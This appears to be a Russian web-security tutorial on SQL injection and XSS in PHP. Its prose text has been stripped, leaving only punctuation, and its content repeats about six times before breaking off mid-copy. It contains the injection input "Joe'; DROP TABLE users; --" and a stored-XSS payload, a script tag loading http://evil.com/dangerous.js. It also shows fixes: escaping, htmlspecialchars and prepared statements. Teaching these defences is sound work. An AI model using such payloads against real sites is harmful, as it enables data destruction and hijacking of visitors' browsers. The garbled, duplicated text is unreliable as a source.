, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
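<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>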
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
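// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);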
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
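<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>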
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
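<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>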
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
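// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);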
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
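<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>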
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
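<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>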
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
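// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);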
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
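<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>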
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
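<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>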
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
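// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);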
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
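<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>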
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
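<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>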
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
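// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);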
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
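<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>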
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
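<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>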
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
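// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);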
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
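<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>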
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
